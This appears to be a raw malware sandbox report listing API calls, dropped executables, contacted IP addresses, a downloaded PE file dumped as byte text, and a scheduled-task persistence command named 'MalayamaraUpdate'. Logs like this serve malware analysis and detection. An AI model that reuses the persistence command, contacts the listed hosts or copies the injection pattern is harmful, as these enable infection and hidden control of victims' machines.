base_address: 0x007ed000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2804
region_size: 114688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00330000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

total_number_of_free_bytes: 13301559296
free_bytes_available: 13301559296
root_path: C:
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 13307293696
free_bytes_available: 13307293696
root_path: C:
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 13415026688
free_bytes_available: 13415026688
root_path: C:
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 13415776256
free_bytes_available: 13415776256
root_path: C:
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 13461782528
free_bytes_available: 13461782528
root_path: C:
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 13461782528
free_bytes_available: 13461782528
root_path: C:
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 13461782528
free_bytes_available: 13461782528
root_path: C:
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 13461782528
free_bytes_available: 13461782528
root_path: C:
total_number_of_bytes: 34252779520
1 1 0
file C:\Users\test22\AppData\Roaming\Temp\Task.bat
file C:\Users\test22\AppData\Local\Temp\nszFB1A.tmp\INetC.dll
file C:\Users\test22\AppData\Local\Temp\InstallSetup9.exe
file C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
file C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
file C:\Users\test22\AppData\Local\Temp\rty25.exe
file C:\Users\test22\AppData\Local\Temp\toolspub1.exe
cmdline schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
file C:\Users\test22\AppData\Local\Temp\InstallSetup9.exe
file C:\Users\test22\AppData\Local\Temp\toolspub1.exe
file C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
file C:\Users\test22\AppData\Local\Temp\rty25.exe
file C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe
file C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
file C:\Users\test22\AppData\Local\Temp\202005191702_6d173b9549ce4fe1e5ada5ab9ce0bfff5d9569f19e7fa916db5c8d4f0dace63b_setup_nwc275a_demo.exe
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\winamp58_3660_beta_full_en-us[1].exe
file C:\Users\test22\AppData\Local\Temp\toolspub1.exe
file C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
file C:\Users\test22\AppData\Local\Temp\workforroc.exe
file C:\Users\test22\AppData\Local\Temp\InstallSetup9.exe
file C:\Users\test22\AppData\Local\Temp\nsqFF70.tmp
file C:\Users\test22\AppData\Local\Temp\nszFB1A.tmp\INetC.dll
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@𺴠Í!¸LÍ!This program cannot be run in DOS mode. $OÀ ' ¡ct ¡ct ¡ctd×ýt¡ctd×Étz¡ctd×Èt/¡ctÙðt¡ct ¡btm¡ctd×Ìt ¡ctd×ùt ¡ctd×þt ¡ctRich ¡ctPELþðbà  &(-@@à"€Û€,‚<0à0Ðs@ .textÚ$& `.rdataÊK@L*@@.data„ƒ"v@À.tlsÍ  ˜@À.rsrcà 02¢@@ÝD$éY—ÌÌÌÌÌÌÌÙD$ƒìÝ$èñ•ƒÄÃÌÌÌÌÌÌÌÌÌÌÌÌÌQ$P‹ÎÇD$è®ÇˆBC‹ÆYÃÌÌLjBCéóÌÌÌÌÌV‹ñLjBCèàöD$t Vè"ƒÄ‹Æ^ÂÌÌÌÌÌÌÌÌÌÌÌ̍PŠ@„Éuù+ÂÃÌÌÌPQRèhïƒÄ ÃÌÌÌÌPQRè¨ƒÄ ÃÌÌÌ̊ˆ ÃÌÌÌÌÌÌÌÌÌÌÌV‹ñ‹ÈWÇFÇFƍy›ŠA„Òuù+ϋùè0_‹Æ^ÃÌÌÌÌÌÌÌÌÌÌÌS3ÛÇF‰^ˆ;÷tLƒ~r ‹PèlƒÄÇF‰^ˆƒs‹OAQWVèƒÄ 닉‰‹G‰F‹O‰N‰_‰_‹Æ[ÃÌÌÌÌÌÌÌÌÌÌÌÌ̃~r ‹PèƒÄÇFÇFÆÃÌÌÌÌÌÌÌÌÌÌÌÌ̋@ÃÌÌÌÌÌÌÌÌÌÌÌÌ3ɉ‰H‰HÃÌÌÌÌ̋OV‹ð;ñsG‹;ÆwA+ð¸“$I’÷îÖÁú‹òÁîò;Ou‹Ïè?‹õ+ƍ‹ORèXƒÄƒG^Ã;Ou‹Ïè‹OVè:ƒGƒÄ^ÃÌ;÷t]ƒ~r ‹PèKƒÄÇFÇFƃs‹OAQWVèèƒÄ ë ‹‰Ç‹G‰F‹O‰NÇGÇG‹ÆÃÌÌÌÌÌÌÌÌÌÌÌÌV‹ÈWqŠA„Òuù+΋t$ ‹ùèe_^€|$t"ƒ~rS‹…ÿt WSVè$íƒÄ S訃Ä[ÇF‰~Æ7ÂÌÌÌÌÌÌÂÌÌÌÌÌÌÌÌÌÌÌÌÌ;As 9w¸Ã3ÀÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌS‹V‹q+ó¸“$I’÷îÖÁú‹òÁîòþH’$ v h$pCèj W‹y+û¸“$I’÷ï×Áú‹ÂÁèFÂ;ðv!‹ÐÑê¿I’$ +ú;øs3ÀëÂ;Æs‹ÆPè“_^[ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌV‹3…öt!W‹{;÷t è«ýÿÿƒÆ;÷uô‹P蹃Ä_ÇÇCÇC^ÃÌÌ3ɉ‰H‰HÂÌÌÌÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌSPƒÈÿ3ÛèÔ[ÃÌÌS‹Ø…ÛtK‹Nƒùr‹ë‹Æ;Ør9ƒùr‹ë‹Æ‹VÐ;Óv%ƒùr‹+ØV‹Ç‹Îè[ËÆ+ØV‹Ç‹Îè€[Ãÿþv h8pCèG ‹F;Çs‹FPWVèM…ÿtLƒ~r ‹ë…ÿuò‰~ƒør ‹ƋÆ[ËÆÆ[ËÆWSPè9ëƒÄ ƒ~‰~r ‹Æ8‹Æ[ËÆÆ8‹Æ[ÃÌÌÌÌÌÌÌÌ̃x‰Hr‹ÆÃxr‹ÃÌÌÌÌÌÌÌh pCèû ÌÌÌÌÌÌPègYÃÌÌÌÌÌÌÌÌU‹ìjÿhP4Cd¡Pƒì SVW¡L‘C3ÅPEôd£‰eð‹ù‹MùI’$ v h$pCèV ‹w+7¸“$I’÷îÖÁú‹ÂÁèÂ;ÁƒŒèyÇEü‹u‹O‹VP‰Eèè‹O‹7‰Mì+θ“$I’÷éÑÁú‹ÚÁëƒÄڅöt$;uìt¤$è‹ûÿÿƒÆ;uìuó‹Q蘃ċEÅ+ЋEè Ý+ӉO ‰O‰‹Môd‰ Y_^[‹å]‹UèRèRƒÄjjèºÌÌÌÌÌÌÌÌ̋H+¸“$I’÷éÑÁú‹ÂÁèÂÃÌÌÌÌÌÌ̋H+¸“$I’÷éÑÁú‹ÂÁèÂÃÌÌÌÌÌÌ̸I’$ ÃÌÌÌÌÌÌÌÌÌ̋H+¸“$I’÷éÑÁú‹ÂÁè‹ÈÑéºI’$ +Ñ;Ðs3ÀëÁ;Æs‹ÆÃÌÌÌÌÌÌÌÌÌÌÌÌh$pCèÞÌÌÌÌÌÌU‹l$VW‹}‹ñ;ûs h pCè +û;Çs‹ø;õu ƒÈÿè?‹Ã3Éè6_‹Æ^]ƒÿþv h8pC臋F;Çs‹FPWV荅ÿtj¸9Er)‹Më&…ÿuí‰~ƒør ‹_ƋÆ^]Â_‹Æ^Æ]‹Í9Fr‹ë‹ÆWËQPè_èƒÄ ƒ~‰~r‹Æ8_‹Æ^]‹ÆÆ8_‹Æ^]ÂÌÌÌÌÌÌ̃þþv h8pCèé‹H;Îs‹HQVPèï3Ò;ÖÀ÷ØÅöu ‰pƒùr‹Æ3Ò;ÖÀ÷ØÃÌÌÌÌÌÌÌÌÌÌÌ̅öt)‹Pƒúr‹ë‹È;ñrƒúr‹ë‹È‹@Á;Æv°Ã2ÀÃh8pCènÌÌÌÌÌÌW‹ø‹F;Ás h pCè¡+Á;Çs‹ø…ÿtL‹VSƒúr‹ë‹Þƒúr‹ë‹Ö+ÇÙPßÑSRè¦ ‹FƒÄ +ǃ~‰F[r ‹Æ‹Æ_ËÎÆ‹Æ_øþÿÿÿÃÌÌÌÌÌÌÌÌÌÌU‹ìjÿhð3Cd¡PƒìSVW¡L‘C3ÅPEôd£‰eð‹E ‹}‹ðƒÎƒþþv‹ðë'‹_¸«ªªª÷æ‹ËÑéÑê;Êv¸þÿÿÿ+Á4;Øv¾þÿÿÿ3ÀN‰Eü;ÈvƒùÿwQè=ƒÄ…Àt‰E ëLMìQMÜÇEìèfh ~CUÜRÇE܈BCèp‹E 
H‰eð‰EèÆEüèʉE ¸¿@Ë}‹uè‹]…Ûtƒr‹ë‹ÇSP‹E Pè-æƒÄ ƒr ‹Q詃ċE Ɖ‰w‰_ƒþr‹øÆ‹Môd‰ Y_^[‹å] ‹uƒ~r ‹RèhƒÄjÇFÇFjÆè¿ÌÌÌÌÌÌÌÌÌÌÌÌÌ̃ÈÿÃÌÌÌÌÌÌÌÌÌÌÌÌjÿh4Cd¡PS¡L‘C3ÄPD$d£3À‰D$;Èt‰AÇAˆ‹D$PƒÈÿ3ÛèJüÿÿ‹L$d‰ Y[ƒÄ ÃÌÌÌÌÌÌÌÌÌ2ÀÃÌÌÌÌÌÌÌÌÌÌÌÌ̋D$PQ‹L$ èáƒÄÂÌÌÌÌÌÌÌÌÌÌÌV‹ð;÷t ètöÿÿƒÆ;÷uô^ÃÌÌÌÌÌÌÌÌÌÌ̃ì3À…ÉtNùI’$ wÍ+ÁÀÀPèfƒÄ…Àu, $QL$ÇD$è’h ~CT$RÇD$ ˆBC蚃ÄÃÌÌÌÌ̃ì3À…Ét>ƒùÿw QèƒÄ…Àu,$PL$ÇD$èBh ~CL$QÇD$ ˆBCèJƒÄÃÌÌÌÌ̋D$VP‹ñèÕLjBC‹Æ^ÂÌÌÌÌÌÌÌjÿh4Cd¡PS¡
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x0074ca00', u'virtual_address': u'0x00002000', u'entropy': 7.928226294675877, u'name': u'.text', u'virtual_size': u'0x0074c8c4'} entropy 7.92822629468 description A section with a high entropy has been found
entropy 0.999732495151 description Overall entropy of this PE file is high
cmdline chcp 1251
cmdline schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
host 185.172.128.109
host 185.172.128.90
host 5.42.64.33
file C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe
cmdline schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
process InstallSetup9.exe useragent NSIS_Inetc (Mozilla)
process rty25.exe useragent HTTPREAD
file C:\Windows\Prefetch\SDIAGNHOST.EXE-8D72177C.pf
file c:\Windows\Temp\fwtsqmfile01.sqm
file C:\Windows\Prefetch\CSC.EXE-BE9AC2DF.pf
file c:\Windows\Temp\fwtsqmfile00.sqm
file C:\Windows\Prefetch\RUNDLL32.EXE-87432CEE.pf
file C:\Windows\Prefetch\RUNDLL32.EXE-7BCB21A1.pf
file C:\Windows\Prefetch\TOOLSPUB1.EXE-62D9747A.pf
file C:\Windows\Prefetch\INJECT-X64.EXE-AAEEB6EB.pf
file C:\Windows\Prefetch\Layout.ini
file C:\Windows\Prefetch\LOGONUI.EXE-09140401.pf
file C:\Users\test22\AppData\Local\Temp\~DF8C0F100C7231519A.TMP
file C:\Windows\Prefetch\IEXPLORE.EXE-908C99F8.pf
file C:\Windows\Prefetch\SETUP.EXE-A9A86358.pf
file C:\Windows\Prefetch\SEARCHINDEXER.EXE-4A6353B9.pf
file C:\Windows\Prefetch\SVCHOST.EXE-CF79EE4C.pf
file C:\Windows\Prefetch\WORKFORROC.EXE-2F91F4D3.pf
file C:\Windows\Prefetch\SEARCHFILTERHOST.EXE-77482212.pf
file C:\Windows\Prefetch\MAINTENANCESERVICE.EXE-FA0B1B99.pf
file C:\Windows\Prefetch\PING.EXE-7E94E73E.pf
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\uglified_jindo[1].js
file C:\Windows\Prefetch\IS32BIT.EXE-9A90D66E.pf
file C:\Windows\Prefetch\ReadyBoot\Trace9.fx
file C:\Windows\Prefetch\SETUP-STUB.EXE-8F842224.pf
file C:\Users\test22\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
file C:\Windows\Prefetch\DLLHOST.EXE-40DD444D.pf
file C:\Windows\Prefetch\MSIEXEC.EXE-A2D55CB6.pf
file C:\Windows\Prefetch\REGSVR32.EXE-8461DBEE.pf
file C:\Windows\Prefetch\ReadyBoot\Trace1.fx
file C:\Windows\Prefetch\CONHOST.EXE-1F3E9D7E.pf
file C:\Windows\Prefetch\AgGlGlobalHistory.db
file C:\Windows\Prefetch\DEFAULT-BROWSER-AGENT.EXE-01C82E17.pf
file C:\Windows\Prefetch\INSTALLSETUP9.EXE-BA053EC2.pf
file C:\Users\test22\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
file C:\Windows\Prefetch\DEFRAG.EXE-588F90AD.pf
file C:\Windows\Prefetch\ReadyBoot\Trace8.fx
file C:\Windows\Prefetch\CMD.EXE-AC113AA8.pf
file C:\Windows\Prefetch\WMIADAP.EXE-F8DFDFA2.pf
file C:\Windows\Prefetch\CONTROL.EXE-817F8F1D.pf
file C:\Windows\Prefetch\SVCHOST.EXE-5901D5E8.pf
file C:\Windows\Prefetch\MMC.EXE-561C5A40.pf
file C:\Windows\Prefetch\CMD.EXE-4A81B364.pf
file C:\Windows\Prefetch\MOBSYNC.EXE-C5E2284F.pf
file C:\Windows\Prefetch\MSCORSVW.EXE-90526FAC.pf
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\MSIMGSIZ.DAT
file C:\Windows\Prefetch\W32TM.EXE-1101AF41.pf
file C:\Windows\Prefetch\INJECT-X64.EXE-7E2195F2.pf
file C:\Windows\Prefetch\MSCORSVW.EXE-57D17DAF.pf
file C:\Windows\Prefetch\7ZG.EXE-0F8C4081.pf
file C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000009.log
file C:\Windows\Prefetch\SVCHOST.EXE-A1476A17.pf
file C:\Users\test22\AppData\Local\Temp\SetupExe(20200504224110B04).log
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\dthumb[10].jpg
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\dthumb[3].png
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1F4WQUHZ\dropbox_logo_text_2015-vfld7_dJ8[1].svg
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\013[1].png
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\sprite-20210713@2x[2].png
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\7028d2d448816aeaab0e_20211029092933036[1].jpg
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\spr_lft_white_150916[1].png
file C:\Windows\Prefetch\WORKFORROC.EXE-2F91F4D3.pf
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\AdPostInjectAsync[1].nhn
file c:\Windows\Temp\fwtsqmfile01.sqm
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\dthumbCAUKPFFO.jpg
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\m_920_294_0729[1].png
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\cropImg_196x196_38699317823237099[1].jpg
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\e84a7e15-e6a9-41ec-9eb7-883e9b5e7249[1].jpg
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\348acc74d7ad9acbdda7_20211101182838273[1].jpg
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\1_237[1].png
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\favicon[3].png
file C:\Windows\Prefetch\WMIADAP.EXE-F8DFDFA2.pf
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\dthumb[9].jpg
file C:\Windows\Prefetch\SVCHOST.EXE-80F4A784.pf
file C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548_000_vcRuntimeMinimum_x64.log
file C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\desktop.ini
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\jquery-1.12.4.min_v1[1].js
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\w[1].css
file C:\Windows\Prefetch\MAINTENANCESERVICE.EXE-FA0B1B99.pf
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\S6uyw4BMUTPHjx4wWA[1].woff
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\CURBIYE7\icon_spacer-vflN3BYt2[1].gif
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\3a7f4c4cb962a54fae75_20200728093632144[1].jpg
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\cropImg_728x360_77691188554226350[1].jpg
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\8c9b6e5b-4abb-45c6-9aa7-aa28806e8e84[1].jpg
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\TopNav[1].js
file C:\Windows\Prefetch\CONTROL.EXE-817F8F1D.pf
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\adf7905c-28ea-4ddf-93b2-aa96dad57752[1].jpg
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\977[1].png
file C:\Windows\Prefetch\MSCORSVW.EXE-90526FAC.pf
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\015[1].png
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\dthumbCAR5WT7S.jpg
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\smart_editor2.me.min.200716[1].css
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\ipsec[3].htm
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\nsd13728808[1].png
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\327[1].png
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\sample-doc-download[1].htm
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\SOC-Facebook[1].png
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\f[2].txt
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\images[1].png
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\f1e83251-9248-4d4e-8d2e-d1505a55bc83[1].jpg
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\3de5642a-2629-4625-9a63-d96768537b11[1].jpg
file C:\Users\test22\AppData\Local\Temp\workforroc.exe
file C:\Windows\Prefetch\VBOXDRVINST.EXE-7DCD6070.pf
dead_host 5.42.64.33:80
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 2548
1 0 0

NtResumeThread

thread_handle: 0x00000150
suspend_count: 1
process_identifier: 2548
1 0 0

NtResumeThread

thread_handle: 0x0000018c
suspend_count: 1
process_identifier: 2548
1 0 0

NtResumeThread

thread_handle: 0x00000208
suspend_count: 1
process_identifier: 2548
1 0 0

CreateProcessInternalW

thread_identifier: 2640
thread_handle: 0x00000394
process_identifier: 2636
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\InstallSetup9.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\InstallSetup9.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\InstallSetup9.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000039c
1 1 0

NtResumeThread

thread_handle: 0x00000338
suspend_count: 1
process_identifier: 2548
1 0 0

NtGetContextThread

thread_handle: 0x000000e4
1 0 0

NtGetContextThread

thread_handle: 0x000000e4
1 0 0

NtResumeThread

thread_handle: 0x000000e4
suspend_count: 1
process_identifier: 2548
1 0 0

NtResumeThread

thread_handle: 0x0000039c
suspend_count: 1
process_identifier: 2548
1 0 0

CreateProcessInternalW

thread_identifier: 2696
thread_handle: 0x000003a8
process_identifier: 2692
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\toolspub1.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\toolspub1.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\toolspub1.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003c4
1 1 0

NtGetContextThread

thread_handle: 0x000000e4
1 0 0

NtGetContextThread

thread_handle: 0x000000e4
1 0 0

NtResumeThread

thread_handle: 0x000000e4
suspend_count: 1
process_identifier: 2548
1 0 0

NtGetContextThread

thread_handle: 0x000000e4
1 0 0

NtGetContextThread

thread_handle: 0x000000e4
1 0 0

NtGetContextThread

thread_handle: 0x000000e4
1 0 0

NtSetContextThread

registers.eip: 1921133444
registers.esp: 4322064
registers.edi: 43478856
registers.eax: 69284968
registers.ebp: 4322088
registers.edx: 1
registers.ebx: 22
registers.esi: 1625471
registers.ecx: 130
thread_handle: 0x000000e4
process_identifier: 2548
1 0 0

NtResumeThread

thread_handle: 0x000000e4
suspend_count: 1
process_identifier: 2548
1 0 0

NtResumeThread

thread_handle: 0x0000039c
suspend_count: 1
process_identifier: 2548
1 0 0

CreateProcessInternalW

thread_identifier: 2740
thread_handle: 0x00000204
process_identifier: 2736
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003b0
1 1 0

NtResumeThread

thread_handle: 0x000001f8
suspend_count: 1
process_identifier: 2548
1 0 0

CreateProcessInternalW

thread_identifier: 2792
thread_handle: 0x00000208
process_identifier: 2788
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\rty25.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\rty25.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\rty25.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003c0
1 1 0

CreateProcessInternalW

thread_identifier: 2900
thread_handle: 0x000001e8
process_identifier: 2896
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
filepath_r:
stack_pivoted: 0
creation_flags: 67108864 (CREATE_DEFAULT_ERROR_MODE)
inherit_handles: 0
process_handle: 0x000001b0
1 1 0

CreateProcessInternalW

thread_identifier: 2800
thread_handle: 0x00000204
process_identifier: 2804
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\nsqFF70.tmp
filepath_r:
stack_pivoted: 0
creation_flags: 67108864 (CREATE_DEFAULT_ERROR_MODE)
inherit_handles: 0
process_handle: 0x0000029c
1 1 0

CreateProcessInternalW

thread_identifier: 1964
thread_handle: 0x0000028c
process_identifier: 940
current_directory: C:\Users\test22\AppData\Roaming\Temp\
filepath:
track: 1
command_line: "C:\Users\test22\AppData\Roaming\Temp\Task.bat"
filepath_r:
stack_pivoted: 0
creation_flags: 48 (CREATE_NEW_CONSOLE|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000298
1 1 0

NtResumeThread

thread_handle: 0x000002ac
suspend_count: 1
process_identifier: 2896
1 0 0

NtResumeThread

thread_handle: 0x000002bc
suspend_count: 1
process_identifier: 2896
1 0 0

NtResumeThread

thread_handle: 0x000002ec
suspend_count: 1
process_identifier: 2896
1 0 0

CreateProcessInternalW

thread_identifier: 0
thread_handle: 0x00000000
process_identifier: 0
current_directory:
filepath:
track: 0
command_line: c
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000000
0 0

CreateProcessInternalW

thread_identifier: 0
thread_handle: 0x00000000
process_identifier: 0
current_directory:
filepath:
track: 0
command_line: c
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000000
0 0

CreateProcessInternalW

thread_identifier: 0
thread_handle: 0x00000000
process_identifier: 0
current_directory:
filepath:
track: 0
command_line: c
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000000
0 0

NtResumeThread

thread_handle: 0x00000300
suspend_count: 1
process_identifier: 2896
1 0 0

CreateProcessInternalW

thread_identifier: 0
thread_handle: 0x00000000
process_identifier: 0
current_directory:
filepath:
track: 0
command_line: c
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000000
0 0

CreateProcessInternalW

thread_identifier: 2108
thread_handle: 0x00000088
process_identifier: 2116
current_directory: C:\Users\test22\AppData\Roaming\Temp
filepath: C:\Windows\System32\chcp.com
track: 1
command_line: chcp 1251
filepath_r: C:\Windows\system32\chcp.com
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

thread_identifier: 148
thread_handle: 0x00000084
process_identifier: 196
current_directory: C:\Users\test22\AppData\Roaming\Temp
filepath: C:\Windows\System32\schtasks.exe
track: 1
command_line: schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
filepath_r: C:\Windows\system32\schtasks.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0